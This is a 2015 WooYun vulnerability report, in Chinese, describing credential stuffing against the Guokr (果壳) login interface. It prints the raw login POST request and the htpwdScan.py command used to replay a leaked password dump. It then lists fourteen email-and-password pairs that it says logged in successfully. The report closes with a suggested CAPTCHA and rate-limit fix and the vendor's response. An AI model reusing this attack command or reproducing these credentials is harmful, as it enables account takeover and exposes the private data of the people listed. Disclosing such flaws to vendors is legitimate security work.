漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110095
漏洞标题:果壳某处可被用于撞库(已验证可登录)
相关厂商:果壳传媒
漏洞作者: 路人甲
提交时间:2015-04-27 16:00
修复时间:2015-05-02 16:02
公开时间:2015-05-02 16:02
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
果壳登录可被用于撞库(已验证可登录)
详细说明:
今天李姐姐大婶在zone社区发布了一款神器 拿来测试一下 效果相当不错
由于数据量少 就拿了一个裤子进行测试 成功条数14条
果壳登录接口可被用于撞库 已验证可登录
POST /sign_in/?success=https%3A%2F%2Faccount.guokr.com%2Foauth2%2Fauthorize%2F%3Fclient_id%3D32353%26redirect_uri%3Dhttp%253A%252F%252Fwww.guokr.com%252Fsso%252F%253Flazy%253Dy%2526rid%253D691603653%2526success%253Dhttp%25253A%25252F%25252Fwww.guokr.com%25252F%26response_type%3Dcode%26state%3De9c1fee646be06a781a33d44a982e14045bf81d31c21323fc8d8c4ca37956944--1429844688%26suppress_prompt%3D1 HTTP/1.1
Host: account.guokr.com
Connection: keep-alive
Content-Length: 123
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://account.guokr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://account.guokr.com/sign_in/?success=https%3A%2F%2Faccount.guokr.com%2Foauth2%2Fauthorize%2F%3Fclient_id%3D32353%26redirect_uri%3Dhttp%253A%252F%252Fwww.guokr.com%252Fsso%252F%253Flazy%253Dy%2526rid%253D691603653%2526success%253Dhttp%25253A%25252F%25252Fwww.guokr.com%25252F%26response_type%3Dcode%26state%3De9c1fee646be06a781a33d44a982e14045bf81d31c21323fc8d8c4ca37956944--1429844688%26suppress_prompt%3D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: __utma=253067679.358546785.1429838379.1429841444.1429844695.3; __utmb=253067679.5.9.1429844700417; __utmc=253067679; __utmz=253067679.1429838379.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=253067679.|1=Is%20Registered=Yes=1; bfd_session_id=bfd_s=253067679.78576726.1429838378740&bfd_g=bffd842b2b484332000055bc01887008553727bc; tmc=4.253067679.25891806.1429844695229.1429844700940.1429844747823; tma=253067679.59622789.1429838378743.1429838378743.1429838378743.1; tmd=10.253067679.59622789.1429838378743.; session=31d58430-6359-4fe0-b092-2f87543990a2
csrf_token=1429848339.65%23%2307cce9a586aa38cbf0c3b0892493ddba861d2f1e&permanent=y&email=lgq.1217%40163.com&password=123456
所用命令:htpwdScan.py -f=post.txt -https -database email,password=123061.txt -regex="([^-]*)----([^-]*)" -err="login-error" -suc="delayShow" -fip
成功数量:14
漏洞证明:
littlefaith@126.com----f298731227
injuin@163.com----zl810315
ricky_eternal@163.com----7uko098i
qimu819@163.com----1992819zy
350346350@qq.com----5059758a
444589012@qq.com----wo58835303
517965249@qq.com----517965249
550188534@qq.com----zxcv123
ssaleey@126.com----ss41913612
yooo123321@163.com----yt1994518
278732042@qq.com----xpc2787
freedy_fd@163.com----fdjyes83
plotsky@163.com----198772123a
penguin618@163.com----qq23222074
可以证明登入接口可撞库
修复方案:
添加验证码,限制账号尝试多次登入
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-02 16:02
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
2015-05-04:非常抱歉,漏洞已经修复,放假期间忘记更新状态了,会给作者发礼物 XD